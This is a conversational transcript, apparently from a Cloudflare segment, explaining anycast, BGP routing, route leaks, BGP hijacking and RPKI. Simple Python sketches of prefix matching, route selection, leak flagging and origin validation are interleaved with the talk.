And site A may have multiple different locations, but each location has one IP address.
And the way in which those sites are distributed to customers can vary.
You can have DNS-based routing.
You can just do round robin. There are a lot of different ways to allocate addresses and allocate capacity out.
Then you can manage that through unicast.
And then there's multicast. And multicast is probably best described by a TV station.
Every single TV station, like ESPN, broadcasts to every single TV.
And you just have to change the channel to be able to receive the feed. But ESPN just broadcasts multicast to everybody.
And then there's anycast. And anycast is like, it's a form of unicast, but the way that anycast distributes its IPs or its server side connection or who to connect to is through this method called BGP, which stands for Border Gateway Protocol.
And essentially what BGP is, is it's a way for different autonomous systems on the Internet to exchange routing information with each other.
And that routing information is basically broken down by hops and local preference.
And what this means is, is that anycast routing is basically some sort of heuristic that says, if I want to connect to this resource, everyone on the network knows how far away they are from that resource and can route you accordingly and can route you to the closest instance of that resource.
And BGP intrinsically defines that model of closeness so that everybody can speak the same language more or less.
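To make the idea of "closest instance" concrete, here is a small Python sketch of anycast from one remote network's point of view. It assumes the only criterion is AS path length, which is a simplification of the real BGP decision process. The site names and the `closest_site` helper are hypothetical; AS 13335 is Cloudflare, and the 645xx numbers are AS numbers reserved for documentation.

```python
def closest_site(paths_by_site):
    """Return the site whose AS path is shortest (ties broken by site name)."""
    # Sorting the site names first makes tie-breaking deterministic.
    return min(sorted(paths_by_site), key=lambda site: len(paths_by_site[site]))


# The same prefix is announced from every site; this network has learned
# one AS path per site.
paths = {
    "Seattle": [64500, 13335],
    "London": [64500, 64501, 64502, 13335],
}
print(closest_site(paths))
```

With these example paths, traffic from this network would be drawn to the Seattle site, because fewer networks sit in between.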
And so when eyeballs connect to Cloudflare, they use this anycast model.
Cloudflare advertises all of our IPs everywhere.
And a user will attempt to say, hey, I want to go to a resource that's hosted on Cloudflare.
And the Internet at large, let's say, basically says, OK, if you're in Seattle like me, I know that the closest instance of these IPs is in Equinix Seattle, which happens to be down the street.
So my traffic literally just travels a few blocks and then ingresses into Cloudflare, at which point Cloudflare takes that and says, OK, so I know that this person came in here.
And they need to go to site A, whose origin is hosted in Quincy, Washington.
So basically, that's on the other side of the state. So they will say, hey, I need to talk to this origin.
And they will find the shortest path via BGP through a bunch of different transits or direct PNIs that we have with cloud providers.
And then it will route there. And then it will come back. And then it will take a path that we hope is similar but is also just optimized based on how everybody connects on the Internet.
And it may be asymmetrical. But we hope that it's as close to similar as possible.
You passed the interview question with flying colors.
I think you'd make it on to the next stage. I really appreciate the depth of that answer and all the aspects of it.
I want to drill in on a couple of things you said just to clear it up.
Because some people may not be familiar with some of the terms.
So you mentioned autonomous system. What is an autonomous system?
So an autonomous system is a set of kind of, it's basically, the way that you should think about this is essentially, it's a network who all share the same space.
And a good example would be Cloudflare. Cloudflare has a bunch of different address spaces that all live under the same Cloudflare umbrella.
So they are assigned an autonomous system. And one organization can have multiple autonomous systems for different purposes.
So for example, Cloudflare actually has multiple autonomous systems that we use for different purposes.
Lots of different entities have different autonomous systems.
But it's basically a way that we can group prefixes together to assign them some sort of kind of space in the network.
And when you say hops, so you mentioned hops before, is that between, what is that between?
And how do kind of autonomous systems fit into that picture?
Yeah, so that's a really good question. So if you take, you know, the path of Cloudflare reaching a customer origin, the customer origin, let's say, is hosted in Microsoft.
And Microsoft, you know, usually we have direct peering with them, which means that when we say, hey, I want to go to Microsoft, the router will say, okay, well, I have a path for you that only takes one hop: you will go from our AS, which is 13335, to the Microsoft AS, which is 8075.
And that's one hop. We're either directly peered, or in some cases, we even have PNIs that directly plug into our routers.
So we can say, hey, this hop has a very low distance, we should prefer that.
That's not always the case. Some origins are hosted in places that don't have optimal peering; we don't have direct, you know, one-hop connectivity with every provider everywhere.
So sometimes we have to take additional hops to get there, we have to go through transits.
And that's what transits are for. They're basically for interconnecting different networks together, so that traffic flows over them, so that, you know, they as a provider can make money.
And, you know, the origins can have increased connectivity by saying, hey, I'll get my transit through this transit provider.
And some transit providers you're probably familiar with are Cogent and Level 3, which is also known as Lumen or CenturyLink.
And GTT and NTT are some really good examples of big transit providers.
And so those, when you connect to an origin via these networks, you actually add an additional hop, right?
The hop is counted by the number of networks that you have to go through to get to your goal.
And that may be one, it may be two, in some cases, it may be three.
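The hop counting described here can be sketched in a few lines of Python. The AS numbers 13335 and 8075 are the ones named in the conversation; 174 is Cogent's AS number, added here for the transit case. The `hop_count` helper is a hypothetical name, and the sketch assumes each AS appears once in the path.

```python
def hop_count(as_path):
    """Number of network-to-network hops along an AS path.

    The path lists each autonomous system once, starting with our own.
    """
    return max(len(as_path) - 1, 0)


CLOUDFLARE, MICROSOFT, COGENT = 13335, 8075, 174

direct = [CLOUDFLARE, MICROSOFT]               # directly peered
via_transit = [CLOUDFLARE, COGENT, MICROSOFT]  # through a transit provider

print(hop_count(direct), hop_count(via_transit))
```

Note that nothing in the path says how many kilometers each hop covers, which is why hop count and physical distance can diverge.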
And hop count is actually very important, because in many cases, hop count actually has no relation to physical distance.
It has to do with logical network distance.
And this actually manifests itself in really interesting ways.
And I know this is kind of off topic, but it's interesting. Johannesburg, South Africa, is actually most closely connected with London, England.
So you would think that if you're trying to get to a resource in, you know, somewhere else in Africa, you would just, you know, go in through the transit in Johannesburg, and then go through a different, you know, you would just go in through a different network that's located in Nigeria, back to the origin in Nigeria.
But what you actually find is, is that what oftentimes happens is you end up going into London, and then back out, because that is the fastest path according to the network.
So network hop counts are usually closely correlated with distance, but they're not always.
And so you mentioned something related here, which is preferences, right?
What are preferences? Yeah. So preferences are basically a way of ordering connectivity, assuming all of the hop counts are equal.
So if I have, let's say, if I'm connecting back to Microsoft, in my Microsoft case, I may have a PNI with Microsoft, which is a physical cable between our router and their router.
I may have a direct peering session, and I may have an Internet exchange.
All of those are around the same hop count, except for the IX. But how do I choose between the direct peering session and PNI?
The answer is I establish a local preference.
And BGP sort of specifies this, right? It basically says any connection in which I'm directly plugged into the router has a higher preference than one where I'm indirectly connected.
But you can override those based on your own weights.
And so Cloudflare, when we do our traffic management, that's sometimes how we shift traffic around between transits and providers.
If one transit is congested, we may de-preference it in favor of another to move traffic over to a different transit to free up congestion.
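A simplified Python sketch of preference-based selection follows. In the standard BGP decision process, local preference is compared before AS path length, so this sketch ranks by local preference first and uses path length as the tie-breaker; every other tie-breaker is left out. The `Route` class, the route names, and the preference values are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class Route:
    name: str
    local_pref: int
    as_path: tuple


def best_route(routes):
    """Pick the highest local preference; a shorter AS path breaks ties."""
    return max(routes, key=lambda r: (r.local_pref, -len(r.as_path)))


routes = [
    Route("pni", 200, (8075,)),
    Route("peering", 150, (8075,)),
    Route("ix", 150, (64500, 8075)),  # 64500 is a documentation AS number
]
print(best_route(routes).name)

# De-preference the PNI, for example because it is congested.
routes[0].local_pref = 50
print(best_route(routes).name)
```

Lowering one route's preference is enough to shift traffic onto the next-best option without touching the routes themselves.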
Great.
That was really helpful. Thank you. So you talked about us announcing our IP prefixes to our networking neighbors, right?
So we're telling the people that we have these direct connections with and others how to reach Cloudflare's network, right?
How do you think about that, though, from a customer IP prefix side, right?
So we launched a product at the network layer called Magic Transit, which allows us to take a customer's data center and attract all the traffic that was headed there, perform some DDoS mitigation and traffic acceleration, and send it on to their origin and do what's called a direct server return, right?
And so that asymmetric routing you were talking about.
But how does everything you described fit with our customer's IP spaces in terms of Cloudflare?
It's a very good question. And the answer is pretty simple.
If we want to attract traffic for a customer, we have to be advertising their IPs on their behalf.
And so part of onboarding to Magic Transit or any BYO IP offering that we have, we have those for Spectrum and Layer 7 CDN as well, is that part of that agreement involves a customer telling everybody else on the Internet, hey, Cloudflare is now announcing our prefixes on our behalf.
So we're basically adding them into our ASN and basically making them a part of our network.
And as a result of that, they get to leverage the speed and the power and the reachability that Cloudflare's network provides.
Yeah, I actually find it really interesting.
So I know we've got a great roadmap in terms of the things like Argo Smart Routing and all the networking capabilities of how we're accelerating traffic and riding over our private backbone.
Our CTO has that graph he likes showing of the speed of light, pretty constant over time and our ability to kind of get close to that.
And we're relying on a lot of those capabilities. But pretty interesting to see just performance increasing even prior to some of these additional layers, just based on the sheer connectedness of Cloudflare's network and from a packet loss and congestion perspective.
So let's talk about some of the threats here.
That's a really helpful overview of how traffic flows. And I know that it's really useful to us as we deal with things like DDoS mitigation.
So to the extent that we can spread that traffic around the world and block it as close to the source of that traffic as possible, the better it is.
And the inability for attackers to target specific data centers, I think you saw many years ago or not many years ago, several years ago with Dyn, I think they were focused on some regional capacity and knocking their DNS servers offline.
And obviously, we're kind of spreading that out just around the world.
Let's talk about some of the threats there though, right?
Because I'm sitting here and I'm fortunate enough to have AT&T as my Internet provider.
And fortunately, I do have a nice gig connection, but I don't have much control over that route, right?
If I'm trying to go to a site, maybe that's protected by PageShield and I want to actually get to that site and interact with it.
Maybe it's a cryptocurrency site, it's Coinbase and I want to go place some trades or something or buy some cryptocurrency.
That path is pretty much dictated to me, right, by my ISP?
Yeah. So we've talked up to now as to kind of the benefits of BGP and what that provides and kind of an inherent pathing and optimization structure.
But there are definitely some drawbacks. And one of the biggest drawbacks about BGP is that it's inherently insecure, that everyone in the network just assumes that if you're announcing routes, then that's accurate.
There was never any security inherently built into BGP.
There's no real way to identify or to ascertain from a provider perspective or from a transit perspective that the routes that this person is announcing are accurate.
And to kind of work around this, we have this process called LOAs and IRR updates.
And essentially what we do is we update our Internet registry records and we send LOAs that basically say, for Magic Transit at least, hey, we're advertising these routes on behalf of the customer and here's a document that the customer has signed that proves that we're allowed to do this.
This is kind of how the Internet has been working for a really long time and it's been relatively successful, but there have definitely been a lot of really big oopsies along the way.
And this can manifest itself in kind of one of two ways.
One way is just kind of an accident, where a provider announces routes that it doesn't have the right to.
And when you see that, typically it manifests itself in what we call a route leak.
And what this means is that, and a good example was listed in the blog post that was just released today, that in 2019, a local Internet provider in Allegheny, Pennsylvania started announcing routes for Cloudflare, Linode, and Amazon.
And what this means is that in a normal world, if this local provider is announcing the same routes as I, Cloudflare, am, then Cloudflare will be preferred because they're all the same and you trust the thing that you know.
But what happened was this local provider actually broke down our routes into sub-prefixes.
So if we were announcing slash 20s, Allegheny, the provider in Allegheny, Pennsylvania was announcing slash 21s.
And an interesting thing about BGP is that BGP prefers a more specific route.
So if you announce a more specific prefix, BGP will prefer that.
And that's exactly what happened, that because Allegheny was using something called a BGP optimizer, they had misconfigured it and were starting to announce sub-routes or de-aggregates of our slash 20.
And all of Cloudflare, Verizon, Google, Amazon, and Linode's traffic just funneled into this small provider in Allegheny, Pennsylvania.
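The "more specific route wins" behavior can be shown with Python's standard `ipaddress` module. This is a minimal sketch of longest-prefix matching, not a model of any real router. The 10.0.0.0 prefixes are private address space used as stand-ins, and the next-hop labels are hypothetical.

```python
import ipaddress


def longest_prefix_match(destination, routes):
    """Return the next hop of the most specific route covering destination."""
    addr = ipaddress.ip_address(destination)
    matches = []
    for prefix, next_hop in routes.items():
        network = ipaddress.ip_network(prefix)
        if addr in network:
            matches.append((network.prefixlen, next_hop))
    if not matches:
        return None
    # The longest prefix length is the most specific match.
    return max(matches)[1]


routes = {
    "10.0.0.0/20": "legitimate origin",  # the intended announcement
    "10.0.0.0/21": "leaking provider",   # a more specific de-aggregate
}
print(longest_prefix_match("10.0.1.1", routes))
print(longest_prefix_match("10.0.9.1", routes))
```

An address inside the /21 follows the leaked route even though the legitimate /20 also covers it; an address in the other half of the /20 is unaffected.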
And this is something that was totally innocuous, right?
Like it wasn't obviously something that they intended to do, but it happened.
And what that causes for a customer is that causes slowness, causes failures, because you're essentially just, and this is the metaphor I use in the blog, it's like taking five lanes of traffic and then condensing them into one.
Everyone's going to honk their horns and be really upset about it, but there's really nothing anybody can do because that's just how the road was designed.
The road wasn't designed to handle five lanes of traffic, it was designed to handle one, and all of a sudden there's just a choke point.
That's what happened, but really there was no malicious intent there.
It was just, I'm deploying a new thing, it was misconfigured and we caused an outage.
It happens, right?
That happens on the Internet all the time. But there is a similar flavor of this called BGP hijacking that actually is very malicious and it's very much intended.
And the problem really arises when, because you can announce more specific routes, if somebody, if a malicious actor wanted to steal your cryptocurrency, what they could do is they could look at Coinbase's advertisements and say, well, they're announcing a slash 22.
So why don't I announce a subnet of that, a slash 24, and then build something that looks almost exactly like Coinbase, and then they will be redirected there or users will be redirected there.
They enter their username and password and all of a sudden, boom, the attacker now has private information.
And basically a BGP hijack by itself doesn't actually cause any harm, but a BGP hijack combined with other attacks makes it very easy for attackers to get access to data by basically abusing how the Internet is supposed to work, right?
The Internet relies on trust and if you've got a malicious actor, you don't have trust anymore.
But BGP is currently not, or BGP as it stands on its own, is not designed to handle malicious actors.
It just assumes that everyone's doing the right thing.
So obviously these issues can cause a lot of pain for our customers, right?
Especially for Cloudflare, which onboards customers through Magic Transit and BYOIP, they're buying a security product.
And if we're not doing our part to help secure the routes and the paths that their customers traverse to get to us, then that's a very big hole.
So the thing that we've designed and released today, Route Leak Detection, basically allows customers to be informed when their prefixes are being leaked or potentially being hijacked.
And what this allows them to do is get out the knowledge and inform their customers, or inform their users, as soon as humanly possible, hey, we've been compromised.
You need to be careful about the sites that you're going on.
You need to make sure that if you're using these subnets, or if you're connecting to sites hosted on these subnets, that you're aware that there may be a potential attack going on.
And part of the problem, I'm sorry I'm going on, is that route leaks are not something that can be mitigated by Cloudflare, right?
Cloudflare is advertising the prefixes, but it takes these providers to honor the advertisement.
And so really what has to be done when you do this is you go and tell these providers, hey, you're honoring a prefix advertisement from someone who's not authorized to advertise it.
So you need to stop doing that. And that's really how route leaks get solved at the end of the day.
And that's a very tedious process, right?
But the sooner that you can kick off that process, the faster you detect, the shorter the impact is.
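As an illustration of what detection could look like in principle, the Python sketch below flags any observed announcement that falls inside our address space but is not exactly one of our own announcements from our own AS. This is an assumption-laden toy, not a description of how Cloudflare's Route Leak Detection works. The `suspicious_announcements` helper, the prefixes, and the AS numbers (taken from the documentation range) are hypothetical.

```python
import ipaddress


def suspicious_announcements(our_prefixes, our_asn, observed):
    """Return observed (prefix, origin_asn) pairs that overlap our space
    but are not one of our own announcements."""
    expected = {ipaddress.ip_network(p) for p in our_prefixes}
    flagged = []
    for prefix, origin in observed:
        net = ipaddress.ip_network(prefix)
        if net in expected and origin == our_asn:
            continue  # exactly what we announce ourselves
        if any(net.version == mine.version and net.subnet_of(mine)
               for mine in expected):
            flagged.append((prefix, origin))
    return flagged


observed = [
    ("10.0.0.0/20", 64500),   # our own announcement
    ("10.0.0.0/21", 64500),   # unexpected de-aggregate of our prefix
    ("10.0.8.0/24", 64501),   # more specific prefix from another AS
    ("192.0.2.0/24", 64502),  # unrelated address space
]
print(suspicious_announcements(["10.0.0.0/20"], 64500, observed))
```

Flagging is only the first step; as described above, the fix still depends on the providers carrying the bad route.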
Great. That was a great answer. Really helpful. Lots to unpack there.
I want to drill into a couple of particular areas. So you mentioned 21, 20, et cetera.
Can you just explain what that is briefly? And then also the attack that we saw, right, that I think that really scared us was Amazon had their Route 53 DNS, right?
And Route 53 is their DNS offering that will tell you where to find these sites, right?
So it wasn't Coinbase, it was some other, I think, crypto provider in that particular case.
And they were trying to, and keep me honest here, they were trying to serve a different IP address back so that they could take that traffic from the client.
Is that right? Yes. So to answer your first question, so slash 23, slash 21, all of that stuff are basically subnets.
IPv4 addresses are 32 bits, in four segments of eight bits each.
And the number after the slash is how many of those leading bits are fixed for the subnet.
And so basically a slash 32 is one IP, and slash 24 is 256 IPs.
And a slash 24 is the smallest block of IPs that is Internet routable.
So you can't actually advertise slash 25s on the Internet.
Well, you can, but BGP is, again, BGP is inherently insecure. So the guidance is just don't do that, but it can happen.
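The arithmetic behind the slash notation can be checked with a short Python sketch: an IPv4 address has 32 bits, so a prefix of length n leaves 32 - n bits free and covers 2^(32 - n) addresses. The `addresses_in` helper and the 10.0.0.0/22 example prefix are illustrative choices.

```python
import ipaddress


def addresses_in(prefix_length):
    """Number of IPv4 addresses covered by a prefix of the given length."""
    return 2 ** (32 - prefix_length)


print(addresses_in(32), addresses_in(24), addresses_in(22))

# A /22 contains four /24s, each of which is large enough to be
# routed on its own.
slash_22 = ipaddress.ip_network("10.0.0.0/22")
slash_24s = list(slash_22.subnets(new_prefix=24))
print([str(n) for n in slash_24s])
```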
But going back to kind of the MyEtherWallet and the Amazon Route 53 problem, yes, that's exactly what we're concerned about.
Like we're concerned about man-in-the-middle. Right now it's pretty easy for an attacker to imitate somebody who's legit, whether through hijacking, you know, DNS prefixes or hijacking, you know, a customer's prefixes and basically saying, hey, you know, I'm Magic Transit customer A, when they're actually not, but, like, enter your personal information and, you know, just see what happens.
It's interesting how a lot of users just inherently trust that the Internet is taking them to the right place.
Yeah. I mean, I think the nice thing there is that there's a layered approach to security, right?
So we've got the concept of the web PKI.
And so if somebody is pretending to be MyEtherWallet, right, then, you know, the browser, and Chrome has done a lot of great work here, and Firefox and others, will warn you that this site is serving you an SSL certificate that either didn't show up in a certificate transparency log or is not actually issued and trusted by the browser, right?
And so you may get somewhere from a network perspective, but if you don't have that cryptographic proof that the server is authenticating as the domain, there's layers of protection there.
So just got a couple minutes left. I think that the thing that I'd like to understand and have you describe, and you mentioned this in your post is, so we're doing a lot of detection, right?
So we're saying, hey, this is happening, you should act, but what is the longer term path?
And then we've been, you know, pushing this isbgpsafeyet.com and we've been, you know, browbeating providers in a sense to deploy this onto their network, to make the network more secure.
Like, can you explain what that is? And we've got about a minute left here and then we go.
Sure. I'll be brief, which is hard. At a very high level, the act of going around and telling providers, hey, this person is not authorized to advertise these routes is automated.
There is a system for this. It's called RPKI.
And RPKI basically allows customers to sign their routes and basically say, I am the only person who's allowed to advertise this.
Providers need to be able to honor these signings and these certificates.
And RPKI and deploying that allows them to be able to do that.
So if you're a customer who's deployed RPKI and you should deploy RPKI, we highly recommend that you push customers or push transit providers who haven't deployed RPKI yet to do so.
Really the only way that the Internet is going to become safer is if every single one of these providers does that.
And isbgpsafeyet.com is a really good way of tracking who's deployed RPKI or not.
We've had some good improvements over the past quarter. And now over 50% of the largest Internet providers, cloud, transit, and ISP combined, are deploying RPKI.
So we're making good progress, but you know, there's still a lot of room to go.
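The check that a provider performs when it honors RPKI can be sketched in Python along the lines of route origin validation: an announcement is valid if some covering authorization names the same origin AS and allows that prefix length, invalid if it is covered but nothing matches, and not-found if nothing covers it. The `validate_origin` helper, the authorization tuples, and the AS numbers are hypothetical, and the cryptographic verification of the signed records is not shown.

```python
import ipaddress


def validate_origin(prefix, origin_asn, roas):
    """Classify an announcement against (prefix, max_length, asn) records."""
    net = ipaddress.ip_network(prefix)
    covered = False
    for roa_prefix, max_length, roa_asn in roas:
        roa_net = ipaddress.ip_network(roa_prefix)
        if net.version != roa_net.version or not net.subnet_of(roa_net):
            continue  # this record does not cover the announcement
        covered = True
        if origin_asn == roa_asn and net.prefixlen <= max_length:
            return "valid"
    return "invalid" if covered else "not-found"


# One record: AS 64500 may announce 10.0.0.0/20, and nothing more specific.
roas = [("10.0.0.0/20", 20, 64500)]

print(validate_origin("10.0.0.0/20", 64500, roas))
print(validate_origin("10.0.0.0/21", 64500, roas))
print(validate_origin("10.0.0.0/20", 64501, roas))
print(validate_origin("192.0.2.0/24", 64500, roas))
```

A provider that drops invalid announcements would reject both the more specific /21 and the announcement from the wrong AS, which is the automation of the "go tell the providers" step described above.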
Terrific. We're out of time here. Thank you so much to everyone that joined today.
Really interesting conversation. Appreciate it.
And excited to see how people start using this.